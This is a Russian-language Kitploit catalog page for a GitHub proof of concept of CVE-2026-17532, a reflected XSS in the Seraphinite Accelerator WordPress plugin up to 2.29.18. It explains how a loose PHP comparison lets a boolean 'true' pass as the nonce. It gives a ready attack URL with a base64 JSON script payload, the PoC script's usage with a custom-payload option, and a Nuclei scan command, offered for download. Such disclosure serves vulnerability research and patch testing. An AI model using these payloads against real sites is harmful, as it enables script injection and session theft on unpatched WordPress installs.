Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-17532 — Seraphinite Accelerator <= 2.29.18 - Отражённый межсайтовый скриптинг (XSS) PoC | Kitploit
Инструменты/GitHubGitHub/kalhoralireza/cve-2026-17532
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubkalhoralireza/cve-2026-17532

CVE-2026-17532

Seraphinite Accelerator <= 2.29.18 - Отражённый межсайтовый скриптинг (XSS) PoC

Репозиторий
231 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Seraphinite Accelerator <= 2.29.18 — Отражённый XSS без аутентификации

Плагин подписывает свои внутренние запросы «подготовки страницы» с помощью HMAC в параметре seraph_accel_prep (JSON в base64), но сравнивает это значение нестрогим оператором PHP !=. Передача JSON-булева значения true в качестве nonce приводит к тому, что сравнение всегда проходит, и поле selfTest затем возвращается без экранирования в виде selfTest-<value>.

Один URL, без аутентификации:

root@kitploit:~
http://TARGET/?seraph_accel_prep=<base64 of {"_tm":"1","nonce":true,"selfTest":"<script>alert(document.domain)</script>"}>

Использование

Python (требуется ):

pip install requests
root@kitploit:~
usage: seraph_accel_xss.py [-h] --url URL [--payload PAYLOAD] [--timeout TIMEOUT]

Seraphinite Accelerator (WordPress) <= 2.29.18

options:
  -h, --help         show this help message and exit
  --url URL          target site, e.g. http://target-site.com
  --payload PAYLOAD  XSS payload (default: <script>alert(document.domain)</script>)
  --timeout TIMEOUT  seconds (default: 30)

Nuclei:

root@kitploit:~
nuclei -u http://target-site.com -t seraphinite-accelerator-prep-xss.yaml -timeout 10

Параметр -timeout 10 нужен, потому что уязвимый участок кода перед ответом засыпает на 5 секунд.

Скачать инструмент